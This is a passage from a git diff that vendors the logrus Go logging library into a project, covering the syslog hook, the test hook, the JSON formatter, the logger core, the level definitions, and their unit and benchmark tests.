lSyslog.NewSyslogHook("", "", syslog.LOG_INFO, "") + + if err == nil { + log.Hooks.Add(hook) + } +} +``` diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go new file mode 100644 index 0000000000..329ce0d60c --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go @@ -0,0 +1,55 @@ +// +build !windows,!nacl,!plan9 + +package syslog + +import ( + "fmt" + "log/syslog" + "os" + + "github.com/sirupsen/logrus" +) + +// SyslogHook to send logs via syslog. +type SyslogHook struct { + Writer *syslog.Writer + SyslogNetwork string + SyslogRaddr string +} + +// Creates a hook to be added to an instance of logger. 
This is called with +// `hook, err := NewSyslogHook("udp", "localhost:514", syslog.LOG_DEBUG, "")` +// `if err == nil { log.Hooks.Add(hook) }` +func NewSyslogHook(network, raddr string, priority syslog.Priority, tag string) (*SyslogHook, error) { + w, err := syslog.Dial(network, raddr, priority, tag) + return &SyslogHook{w, network, raddr}, err +} + +func (hook *SyslogHook) Fire(entry *logrus.Entry) error { + line, err := entry.String() + if err != nil { + fmt.Fprintf(os.Stderr, "Unable to read entry, %v", err) + return err + } + + switch entry.Level { + case logrus.PanicLevel: + return hook.Writer.Crit(line) + case logrus.FatalLevel: + return hook.Writer.Crit(line) + case logrus.ErrorLevel: + return hook.Writer.Err(line) + case logrus.WarnLevel: + return hook.Writer.Warning(line) + case logrus.InfoLevel: + return hook.Writer.Info(line) + case logrus.DebugLevel: + return hook.Writer.Debug(line) + default: + return nil + } +} + +func (hook *SyslogHook) Levels() []logrus.Level { + return logrus.AllLevels +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go new file mode 100644 index 0000000000..5ec3a44454 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go @@ -0,0 +1,27 @@ +package syslog + +import ( + "log/syslog" + "testing" + + "github.com/sirupsen/logrus" +) + +func TestLocalhostAddAndPrint(t *testing.T) { + log := logrus.New() + hook, err := NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "") + + if err != nil { + t.Errorf("Unable to connect to local syslog.") + } + + log.Hooks.Add(hook) + + for _, level := range hook.Levels() { + if len(log.Hooks[level]) != 1 { + t.Errorf("SyslogHook was not added. 
The length of log.Hooks[%v]: %v", level, len(log.Hooks[level])) + } + } + + log.Info("Congratulations!") +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test.go b/vendor/github.com/Sirupsen/logrus/hooks/test/test.go new file mode 100644 index 0000000000..62c4845df7 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/test/test.go @@ -0,0 +1,95 @@ +// The Test package is used for testing logrus. It is here for backwards +// compatibility from when logrus' organization was upper-case. Please use +// lower-case logrus and the `null` package instead of this one. +package test + +import ( + "io/ioutil" + "sync" + + "github.com/sirupsen/logrus" +) + +// Hook is a hook designed for dealing with logs in test scenarios. +type Hook struct { + // Entries is an array of all entries that have been received by this hook. + // For safe access, use the AllEntries() method, rather than reading this + // value directly. + Entries []*logrus.Entry + mu sync.RWMutex +} + +// NewGlobal installs a test hook for the global logger. +func NewGlobal() *Hook { + + hook := new(Hook) + logrus.AddHook(hook) + + return hook + +} + +// NewLocal installs a test hook for a given local logger. +func NewLocal(logger *logrus.Logger) *Hook { + + hook := new(Hook) + logger.Hooks.Add(hook) + + return hook + +} + +// NewNullLogger creates a discarding logger and installs the test hook. +func NewNullLogger() (*logrus.Logger, *Hook) { + + logger := logrus.New() + logger.Out = ioutil.Discard + + return logger, NewLocal(logger) + +} + +func (t *Hook) Fire(e *logrus.Entry) error { + t.mu.Lock() + defer t.mu.Unlock() + t.Entries = append(t.Entries, e) + return nil +} + +func (t *Hook) Levels() []logrus.Level { + return logrus.AllLevels +} + +// LastEntry returns the last entry that was logged or nil. 
+func (t *Hook) LastEntry() *logrus.Entry { + t.mu.RLock() + defer t.mu.RUnlock() + i := len(t.Entries) - 1 + if i < 0 { + return nil + } + // Make a copy, for safety + e := *t.Entries[i] + return &e +} + +// AllEntries returns all entries that were logged. +func (t *Hook) AllEntries() []*logrus.Entry { + t.mu.RLock() + defer t.mu.RUnlock() + // Make a copy so the returned value won't race with future log requests + entries := make([]*logrus.Entry, len(t.Entries)) + for i, entry := range t.Entries { + // Make a copy, for safety + e := *entry + entries[i] = &e + } + return entries +} + +// Reset removes all Entries from this test hook. +func (t *Hook) Reset() { + t.mu.Lock() + defer t.mu.Unlock() + t.Entries = make([]*logrus.Entry, 0) +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go b/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go new file mode 100644 index 0000000000..dea768e6c5 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go @@ -0,0 +1,61 @@ +package test + +import ( + "sync" + "testing" + + "github.com/sirupsen/logrus" + "github.com/stretchr/testify/assert" +) + +func TestAllHooks(t *testing.T) { + assert := assert.New(t) + + logger, hook := NewNullLogger() + assert.Nil(hook.LastEntry()) + assert.Equal(0, len(hook.Entries)) + + logger.Error("Hello error") + assert.Equal(logrus.ErrorLevel, hook.LastEntry().Level) + assert.Equal("Hello error", hook.LastEntry().Message) + assert.Equal(1, len(hook.Entries)) + + logger.Warn("Hello warning") + assert.Equal(logrus.WarnLevel, hook.LastEntry().Level) + assert.Equal("Hello warning", hook.LastEntry().Message) + assert.Equal(2, len(hook.Entries)) + + hook.Reset() + assert.Nil(hook.LastEntry()) + assert.Equal(0, len(hook.Entries)) + + hook = NewGlobal() + + logrus.Error("Hello error") + assert.Equal(logrus.ErrorLevel, hook.LastEntry().Level) + assert.Equal("Hello error", hook.LastEntry().Message) + assert.Equal(1, len(hook.Entries)) +} + +func 
TestLoggingWithHooksRace(t *testing.T) { + assert := assert.New(t) + logger, hook := NewNullLogger() + + var wg sync.WaitGroup + wg.Add(100) + + for i := 0; i < 100; i++ { + go func() { + logger.Info("info") + wg.Done() + }() + } + + assert.Equal(logrus.InfoLevel, hook.LastEntry().Level) + assert.Equal("info", hook.LastEntry().Message) + + wg.Wait() + + entries := hook.AllEntries() + assert.Equal(100, len(entries)) +} diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter.go b/vendor/github.com/Sirupsen/logrus/json_formatter.go new file mode 100644 index 0000000000..fb01c1b104 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/json_formatter.go @@ -0,0 +1,79 @@ +package logrus + +import ( + "encoding/json" + "fmt" +) + +type fieldKey string + +// FieldMap allows customization of the key names for default fields. +type FieldMap map[fieldKey]string + +// Default key names for the default fields +const ( + FieldKeyMsg = "msg" + FieldKeyLevel = "level" + FieldKeyTime = "time" +) + +func (f FieldMap) resolve(key fieldKey) string { + if k, ok := f[key]; ok { + return k + } + + return string(key) +} + +// JSONFormatter formats logs into parsable json +type JSONFormatter struct { + // TimestampFormat sets the format used for marshaling timestamps. + TimestampFormat string + + // DisableTimestamp allows disabling automatic timestamps in output + DisableTimestamp bool + + // FieldMap allows users to customize the names of keys for default fields. 
+ // As an example: + // formatter := &JSONFormatter{ + // FieldMap: FieldMap{ + // FieldKeyTime: "@timestamp", + // FieldKeyLevel: "@level", + // FieldKeyMsg: "@message", + // }, + // } + FieldMap FieldMap +} + +// Format renders a single log entry +func (f *JSONFormatter) Format(entry *Entry) ([]byte, error) { + data := make(Fields, len(entry.Data)+3) + for k, v := range entry.Data { + switch v := v.(type) { + case error: + // Otherwise errors are ignored by `encoding/json` + // https://github.com/sirupsen/logrus/issues/137 + data[k] = v.Error() + default: + data[k] = v + } + } + prefixFieldClashes(data) + + timestampFormat := f.TimestampFormat + if timestampFormat == "" { + timestampFormat = defaultTimestampFormat + } + + if !f.DisableTimestamp { + data[f.FieldMap.resolve(FieldKeyTime)] = entry.Time.Format(timestampFormat) + } + data[f.FieldMap.resolve(FieldKeyMsg)] = entry.Message + data[f.FieldMap.resolve(FieldKeyLevel)] = entry.Level.String() + + serialized, err := json.Marshal(data) + if err != nil { + return nil, fmt.Errorf("Failed to marshal fields to JSON, %v", err) + } + return append(serialized, '\n'), nil +} diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter_test.go b/vendor/github.com/Sirupsen/logrus/json_formatter_test.go new file mode 100644 index 0000000000..51093a79ba --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/json_formatter_test.go @@ -0,0 +1,199 @@ +package logrus + +import ( + "encoding/json" + "errors" + "strings" + "testing" +) + +func TestErrorNotLost(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("error", errors.New("wild walrus"))) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["error"] != "wild walrus" { + t.Fatal("Error field not set") + } +} + +func TestErrorNotLostOnFieldNotNamedError(t 
*testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("omg", errors.New("wild walrus"))) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["omg"] != "wild walrus" { + t.Fatal("Error field not set") + } +} + +func TestFieldClashWithTime(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("time", "right now!")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["fields.time"] != "right now!" { + t.Fatal("fields.time not set to original time field") + } + + if entry["time"] != "0001-01-01T00:00:00Z" { + t.Fatal("time field not set to current time, was: ", entry["time"]) + } +} + +func TestFieldClashWithMsg(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("msg", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["fields.msg"] != "something" { + t.Fatal("fields.msg not set to original msg field") + } +} + +func TestFieldClashWithLevel(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["fields.level"] != "something" { + t.Fatal("fields.level not set to original level field") + } +} + +func TestJSONEntryEndsWithNewline(t 
*testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + if b[len(b)-1] != '\n' { + t.Fatal("Expected JSON log entry to end with a newline") + } +} + +func TestJSONMessageKey(t *testing.T) { + formatter := &JSONFormatter{ + FieldMap: FieldMap{ + FieldKeyMsg: "message", + }, + } + + b, err := formatter.Format(&Entry{Message: "oh hai"}) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if !(strings.Contains(s, "message") && strings.Contains(s, "oh hai")) { + t.Fatal("Expected JSON to format message key") + } +} + +func TestJSONLevelKey(t *testing.T) { + formatter := &JSONFormatter{ + FieldMap: FieldMap{ + FieldKeyLevel: "somelevel", + }, + } + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if !strings.Contains(s, "somelevel") { + t.Fatal("Expected JSON to format level key") + } +} + +func TestJSONTimeKey(t *testing.T) { + formatter := &JSONFormatter{ + FieldMap: FieldMap{ + FieldKeyTime: "timeywimey", + }, + } + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if !strings.Contains(s, "timeywimey") { + t.Fatal("Expected JSON to format time key") + } +} + +func TestJSONDisableTimestamp(t *testing.T) { + formatter := &JSONFormatter{ + DisableTimestamp: true, + } + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if strings.Contains(s, FieldKeyTime) { + t.Error("Did not prevent timestamp", s) + } +} + +func TestJSONEnableTimestamp(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if 
!strings.Contains(s, FieldKeyTime) { + t.Error("Timestamp not present", s) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/logger.go b/vendor/github.com/Sirupsen/logrus/logger.go new file mode 100644 index 0000000000..fdaf8a6534 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logger.go @@ -0,0 +1,323 @@ +package logrus + +import ( + "io" + "os" + "sync" + "sync/atomic" +) + +type Logger struct { + // The logs are `io.Copy`'d to this in a mutex. It's common to set this to a + // file, or leave it default which is `os.Stderr`. You can also set this to + // something more adventorous, such as logging to Kafka. + Out io.Writer + // Hooks for the logger instance. These allow firing events based on logging + // levels and log entries. For example, to send errors to an error tracking + // service, log to StatsD or dump the core on fatal errors. + Hooks LevelHooks + // All log entries pass through the formatter before logged to Out. The + // included formatters are `TextFormatter` and `JSONFormatter` for which + // TextFormatter is the default. In development (when a TTY is attached) it + // logs with colors, but to a file it wouldn't. You can easily implement your + // own that implements the `Formatter` interface, see the `README` or included + // formatters for examples. + Formatter Formatter + // The logging level the logger should log at. This is typically (and defaults + // to) `logrus.Info`, which allows Info(), Warn(), Error() and Fatal() to be + // logged. + Level Level + // Used to sync writing to the log. Locking is enabled by Default + mu MutexWrap + // Reusable empty entry + entryPool sync.Pool +} + +type MutexWrap struct { + lock sync.Mutex + disabled bool +} + +func (mw *MutexWrap) Lock() { + if !mw.disabled { + mw.lock.Lock() + } +} + +func (mw *MutexWrap) Unlock() { + if !mw.disabled { + mw.lock.Unlock() + } +} + +func (mw *MutexWrap) Disable() { + mw.disabled = true +} + +// Creates a new logger. 
Configuration should be set by changing `Formatter`, +// `Out` and `Hooks` directly on the default logger instance. You can also just +// instantiate your own: +// +// var log = &Logger{ +// Out: os.Stderr, +// Formatter: new(JSONFormatter), +// Hooks: make(LevelHooks), +// Level: logrus.DebugLevel, +// } +// +// It's recommended to make this a global instance called `log`. +func New() *Logger { + return &Logger{ + Out: os.Stderr, + Formatter: new(TextFormatter), + Hooks: make(LevelHooks), + Level: InfoLevel, + } +} + +func (logger *Logger) newEntry() *Entry { + entry, ok := logger.entryPool.Get().(*Entry) + if ok { + return entry + } + return NewEntry(logger) +} + +func (logger *Logger) releaseEntry(entry *Entry) { + logger.entryPool.Put(entry) +} + +// Adds a field to the log entry, note that it doesn't log until you call +// Debug, Print, Info, Warn, Fatal or Panic. It only creates a log entry. +// If you want multiple fields, use `WithFields`. +func (logger *Logger) WithField(key string, value interface{}) *Entry { + entry := logger.newEntry() + defer logger.releaseEntry(entry) + return entry.WithField(key, value) +} + +// Adds a struct of fields to the log entry. All it does is call `WithField` for +// each `Field`. +func (logger *Logger) WithFields(fields Fields) *Entry { + entry := logger.newEntry() + defer logger.releaseEntry(entry) + return entry.WithFields(fields) +} + +// Add an error as single field to the log entry. All it does is call +// `WithError` for the given `error`. +func (logger *Logger) WithError(err error) *Entry { + entry := logger.newEntry() + defer logger.releaseEntry(entry) + return entry.WithError(err) +} + +func (logger *Logger) Debugf(format string, args ...interface{}) { + if logger.level() >= DebugLevel { + entry := logger.newEntry() + entry.Debugf(format, args...) 
+ logger.releaseEntry(entry) + } +} + +func (logger *Logger) Infof(format string, args ...interface{}) { + if logger.level() >= InfoLevel { + entry := logger.newEntry() + entry.Infof(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Printf(format string, args ...interface{}) { + entry := logger.newEntry() + entry.Printf(format, args...) + logger.releaseEntry(entry) +} + +func (logger *Logger) Warnf(format string, args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Warningf(format string, args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Errorf(format string, args ...interface{}) { + if logger.level() >= ErrorLevel { + entry := logger.newEntry() + entry.Errorf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Fatalf(format string, args ...interface{}) { + if logger.level() >= FatalLevel { + entry := logger.newEntry() + entry.Fatalf(format, args...) + logger.releaseEntry(entry) + } + Exit(1) +} + +func (logger *Logger) Panicf(format string, args ...interface{}) { + if logger.level() >= PanicLevel { + entry := logger.newEntry() + entry.Panicf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Debug(args ...interface{}) { + if logger.level() >= DebugLevel { + entry := logger.newEntry() + entry.Debug(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Info(args ...interface{}) { + if logger.level() >= InfoLevel { + entry := logger.newEntry() + entry.Info(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Print(args ...interface{}) { + entry := logger.newEntry() + entry.Info(args...) 
+ logger.releaseEntry(entry) +} + +func (logger *Logger) Warn(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warn(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Warning(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warn(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Error(args ...interface{}) { + if logger.level() >= ErrorLevel { + entry := logger.newEntry() + entry.Error(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Fatal(args ...interface{}) { + if logger.level() >= FatalLevel { + entry := logger.newEntry() + entry.Fatal(args...) + logger.releaseEntry(entry) + } + Exit(1) +} + +func (logger *Logger) Panic(args ...interface{}) { + if logger.level() >= PanicLevel { + entry := logger.newEntry() + entry.Panic(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Debugln(args ...interface{}) { + if logger.level() >= DebugLevel { + entry := logger.newEntry() + entry.Debugln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Infoln(args ...interface{}) { + if logger.level() >= InfoLevel { + entry := logger.newEntry() + entry.Infoln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Println(args ...interface{}) { + entry := logger.newEntry() + entry.Println(args...) + logger.releaseEntry(entry) +} + +func (logger *Logger) Warnln(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Warningln(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Errorln(args ...interface{}) { + if logger.level() >= ErrorLevel { + entry := logger.newEntry() + entry.Errorln(args...) 
+ logger.releaseEntry(entry) + } +} + +func (logger *Logger) Fatalln(args ...interface{}) { + if logger.level() >= FatalLevel { + entry := logger.newEntry() + entry.Fatalln(args...) + logger.releaseEntry(entry) + } + Exit(1) +} + +func (logger *Logger) Panicln(args ...interface{}) { + if logger.level() >= PanicLevel { + entry := logger.newEntry() + entry.Panicln(args...) + logger.releaseEntry(entry) + } +} + +//When file is opened with appending mode, it's safe to +//write concurrently to a file (within 4k message on Linux). +//In these cases user can choose to disable the lock. +func (logger *Logger) SetNoLock() { + logger.mu.Disable() +} + +func (logger *Logger) level() Level { + return Level(atomic.LoadUint32((*uint32)(&logger.Level))) +} + +func (logger *Logger) SetLevel(level Level) { + atomic.StoreUint32((*uint32)(&logger.Level), uint32(level)) +} + +func (logger *Logger) AddHook(hook Hook) { + logger.mu.Lock() + defer logger.mu.Unlock() + logger.Hooks.Add(hook) +} diff --git a/vendor/github.com/Sirupsen/logrus/logger_bench_test.go b/vendor/github.com/Sirupsen/logrus/logger_bench_test.go new file mode 100644 index 0000000000..dd23a3535e --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logger_bench_test.go @@ -0,0 +1,61 @@ +package logrus + +import ( + "os" + "testing" +) + +// smallFields is a small size data set for benchmarking +var loggerFields = Fields{ + "foo": "bar", + "baz": "qux", + "one": "two", + "three": "four", +} + +func BenchmarkDummyLogger(b *testing.B) { + nullf, err := os.OpenFile("/dev/null", os.O_WRONLY, 0666) + if err != nil { + b.Fatalf("%v", err) + } + defer nullf.Close() + doLoggerBenchmark(b, nullf, &TextFormatter{DisableColors: true}, smallFields) +} + +func BenchmarkDummyLoggerNoLock(b *testing.B) { + nullf, err := os.OpenFile("/dev/null", os.O_WRONLY|os.O_APPEND, 0666) + if err != nil { + b.Fatalf("%v", err) + } + defer nullf.Close() + doLoggerBenchmarkNoLock(b, nullf, &TextFormatter{DisableColors: true}, smallFields) +} + 
+func doLoggerBenchmark(b *testing.B, out *os.File, formatter Formatter, fields Fields) { + logger := Logger{ + Out: out, + Level: InfoLevel, + Formatter: formatter, + } + entry := logger.WithFields(fields) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + entry.Info("aaa") + } + }) +} + +func doLoggerBenchmarkNoLock(b *testing.B, out *os.File, formatter Formatter, fields Fields) { + logger := Logger{ + Out: out, + Level: InfoLevel, + Formatter: formatter, + } + logger.SetNoLock() + entry := logger.WithFields(fields) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + entry.Info("aaa") + } + }) +} diff --git a/vendor/github.com/Sirupsen/logrus/logrus.go b/vendor/github.com/Sirupsen/logrus/logrus.go new file mode 100644 index 0000000000..dd38999741 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logrus.go @@ -0,0 +1,143 @@ +package logrus + +import ( + "fmt" + "log" + "strings" +) + +// Fields type, used to pass to `WithFields`. +type Fields map[string]interface{} + +// Level type +type Level uint32 + +// Convert the Level to a string. E.g. PanicLevel becomes "panic". +func (level Level) String() string { + switch level { + case DebugLevel: + return "debug" + case InfoLevel: + return "info" + case WarnLevel: + return "warning" + case ErrorLevel: + return "error" + case FatalLevel: + return "fatal" + case PanicLevel: + return "panic" + } + + return "unknown" +} + +// ParseLevel takes a string level and returns the Logrus log level constant. 
+func ParseLevel(lvl string) (Level, error) { + switch strings.ToLower(lvl) { + case "panic": + return PanicLevel, nil + case "fatal": + return FatalLevel, nil + case "error": + return ErrorLevel, nil + case "warn", "warning": + return WarnLevel, nil + case "info": + return InfoLevel, nil + case "debug": + return DebugLevel, nil + } + + var l Level + return l, fmt.Errorf("not a valid logrus Level: %q", lvl) +} + +// A constant exposing all logging levels +var AllLevels = []Level{ + PanicLevel, + FatalLevel, + ErrorLevel, + WarnLevel, + InfoLevel, + DebugLevel, +} + +// These are the different logging levels. You can set the logging level to log +// on your instance of logger, obtained with `logrus.New()`. +const ( + // PanicLevel level, highest level of severity. Logs and then calls panic with the + // message passed to Debug, Info, ... + PanicLevel Level = iota + // FatalLevel level. Logs and then calls `os.Exit(1)`. It will exit even if the + // logging level is set to Panic. + FatalLevel + // ErrorLevel level. Logs. Used for errors that should definitely be noted. + // Commonly used for hooks to send errors to an error tracking service. + ErrorLevel + // WarnLevel level. Non-critical entries that deserve eyes. + WarnLevel + // InfoLevel level. General operational entries about what's going on inside the + // application. + InfoLevel + // DebugLevel level. Usually only enabled when debugging. Very verbose logging. + DebugLevel +) + +// Won't compile if StdLogger can't be realized by a log.Logger +var ( + _ StdLogger = &log.Logger{} + _ StdLogger = &Entry{} + _ StdLogger = &Logger{} +) + +// StdLogger is what your logrus-enabled library should take, that way +// it'll accept a stdlib logger and a logrus logger. There's no standard +// interface, this is the closest we get, unfortunately. 
+type StdLogger interface { + Print(...interface{}) + Printf(string, ...interface{}) + Println(...interface{}) + + Fatal(...interface{}) + Fatalf(string, ...interface{}) + Fatalln(...interface{}) + + Panic(...interface{}) + Panicf(string, ...interface{}) + Panicln(...interface{}) +} + +// The FieldLogger interface generalizes the Entry and Logger types +type FieldLogger interface { + WithField(key string, value interface{}) *Entry + WithFields(fields Fields) *Entry + WithError(err error) *Entry + + Debugf(format string, args ...interface{}) + Infof(format string, args ...interface{}) + Printf(format string, args ...interface{}) + Warnf(format string, args ...interface{}) + Warningf(format string, args ...interface{}) + Errorf(format string, args ...interface{}) + Fatalf(format string, args ...interface{}) + Panicf(format string, args ...interface{}) + + Debug(args ...interface{}) + Info(args ...interface{}) + Print(args ...interface{}) + Warn(args ...interface{}) + Warning(args ...interface{}) + Error(args ...interface{}) + Fatal(args ...interface{}) + Panic(args ...interface{}) + + Debugln(args ...interface{}) + Infoln(args ...interface{}) + Println(args ...interface{}) + Warnln(args ...interface{}) + Warningln(args ...interface{}) + Errorln(args ...interface{}) + Fatalln(args ...interface{}) + Panicln(args ...interface{}) +} diff --git a/vendor/github.com/Sirupsen/logrus/logrus_test.go b/vendor/github.com/Sirupsen/logrus/logrus_test.go new file mode 100644 index 0000000000..78cbc28259 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logrus_test.go @@ -0,0 +1,386 @@ +package logrus + +import ( + "bytes" + "encoding/json" + "strconv" + "strings" + "sync" + "testing" + + "github.com/stretchr/testify/assert" +) + +func LogAndAssertJSON(t *testing.T, log func(*Logger), assertions func(fields Fields)) { + var buffer bytes.Buffer + var fields Fields + + logger := New() + logger.Out = &buffer + logger.Formatter = new(JSONFormatter) + + log(logger) + + err := 
json.Unmarshal(buffer.Bytes(), &fields) + assert.Nil(t, err) + + assertions(fields) +} + +func LogAndAssertText(t *testing.T, log func(*Logger), assertions func(fields map[string]string)) { + var buffer bytes.Buffer + + logger := New() + logger.Out = &buffer + logger.Formatter = &TextFormatter{ + DisableColors: true, + } + + log(logger) + + fields := make(map[string]string) + for _, kv := range strings.Split(buffer.String(), " ") { + if !strings.Contains(kv, "=") { + continue + } + kvArr := strings.Split(kv, "=") + key := strings.TrimSpace(kvArr[0]) + val := kvArr[1] + if kvArr[1][0] == '"' { + var err error + val, err = strconv.Unquote(val) + assert.NoError(t, err) + } + fields[key] = val + } + assertions(fields) +} + +func TestPrint(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Print("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["level"], "info") + }) +} + +func TestInfo(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["level"], "info") + }) +} + +func TestWarn(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Warn("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["level"], "warning") + }) +} + +func TestInfolnShouldAddSpacesBetweenStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln("test", "test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test test") + }) +} + +func TestInfolnShouldAddSpacesBetweenStringAndNonstring(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln("test", 10) + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test 10") + }) +} + +func TestInfolnShouldAddSpacesBetweenTwoNonStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln(10, 10) + }, func(fields Fields) { + assert.Equal(t, 
fields["msg"], "10 10") + }) +} + +func TestInfoShouldAddSpacesBetweenTwoNonStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln(10, 10) + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "10 10") + }) +} + +func TestInfoShouldNotAddSpacesBetweenStringAndNonstring(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Info("test", 10) + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test10") + }) +} + +func TestInfoShouldNotAddSpacesBetweenStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Info("test", "test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "testtest") + }) +} + +func TestWithFieldsShouldAllowAssignments(t *testing.T) { + var buffer bytes.Buffer + var fields Fields + + logger := New() + logger.Out = &buffer + logger.Formatter = new(JSONFormatter) + + localLog := logger.WithFields(Fields{ + "key1": "value1", + }) + + localLog.WithField("key2", "value2").Info("test") + err := json.Unmarshal(buffer.Bytes(), &fields) + assert.Nil(t, err) + + assert.Equal(t, "value2", fields["key2"]) + assert.Equal(t, "value1", fields["key1"]) + + buffer = bytes.Buffer{} + fields = Fields{} + localLog.Info("test") + err = json.Unmarshal(buffer.Bytes(), &fields) + assert.Nil(t, err) + + _, ok := fields["key2"] + assert.Equal(t, false, ok) + assert.Equal(t, "value1", fields["key1"]) +} + +func TestUserSuppliedFieldDoesNotOverwriteDefaults(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.WithField("msg", "hello").Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + }) +} + +func TestUserSuppliedMsgFieldHasPrefix(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.WithField("msg", "hello").Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["fields.msg"], "hello") + }) +} + +func TestUserSuppliedTimeFieldHasPrefix(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + 
